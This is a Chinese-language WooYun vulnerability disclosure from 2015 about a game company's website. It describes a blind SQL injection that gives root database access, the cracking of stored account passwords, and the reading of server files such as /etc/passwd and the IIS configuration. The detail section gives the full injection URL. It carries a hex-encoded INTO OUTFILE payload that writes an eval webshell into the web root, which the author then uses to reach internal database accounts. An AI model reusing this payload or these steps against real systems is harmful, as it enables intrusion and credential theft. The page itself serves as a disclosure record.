当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116153

漏洞标题:我是如何近距离接触电魂数据库的

相关厂商:电魂网络

漏洞作者: 庙口大王

提交时间:2015-05-25 19:18

修复时间:2015-07-09 19:20

公开时间:2015-07-09 19:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

爱迷魂、爱梦三!
内测就开始玩梦三国,很不错的一款游戏。
LOL选手慎入。

详细说明:

从一个盲注开始
http://dj.17m3.com/game.aspx?sercon=*

back-end DBMS: MySQL 5.0.11


current user:    'root\\@122.224.197.%'


竟然是root
mysql.user读出来帐号密码,成功解密了2个
上神器cloudeye
一个劲的读/etc/sysconfig/network-scripts/ifcfg-eth0,/etc/passwd
然后一个劲的报错
手贱HEX读了下c:/windows/system32/cmd.exe 发现竟然有返回,竟然是windows、win主机cloudeye不是应该能返回apache日志ip的么但是这里确实没有。
继续
从C:\WINDOWS\system32\LogFiles\HTTPERR\httperr1.log中读出来ip
发现数据库服务器上还有iis
读C:\WINDOWS\system32\inetsrv\MetaBase.xml
得到一个主机头跟目录
写shell

http://dj.17m3.com/game.aspx?sercon=%' LIMIT 0,1 INTO OUTFILE 'F:/TenMinBreak/wwwroot/edm.mail.m3guocdn.com/bbb.aspx' LINES TERMINATED BY 0x68693C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B2261626364225D2C22756E7361666522293B253E--  AND '%'='


上菜刀。
各种内网sa,root。
这台数据库服务器太丰富了,没敢再进一步深入了。

漏洞证明:

1.gif

2.gif

3.gif

4.gif

5.gif

修复方案:

最起码别数据库服务器放公网了。

版权声明:转载请注明来源 庙口大王@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)